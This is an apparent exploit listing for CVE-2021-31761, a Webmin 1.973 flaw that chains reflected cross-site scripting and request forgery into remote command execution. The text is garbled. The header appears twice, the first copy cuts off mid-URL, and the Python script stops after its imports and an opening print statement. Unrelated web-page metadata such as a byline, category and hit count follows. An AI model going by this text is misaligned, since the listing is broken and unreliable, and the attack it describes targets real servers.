# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)
# Date: 24/04/2021
# Exploit Author: Mesh3l_911 & Z0ldyck
# Vendor Homepage: https://www.webmin.c # Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)
# Date: 24/04/2021
# Exploit Author: Mesh3l_911 & Z0ldyck
# Vendor Homepage: https://www.webmin.com
# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761
# Version: Webmin 1.973
# Tested on: All versions <= 1.973
# CVE: CVE-2021-31761
# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to
# get a Remote Command Execution (RCE) through the Webmin's running process
# feature
import time, subprocess,random,urllib.parse
print('''
Webmin 1.973 Cross Site Request Forgery
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 168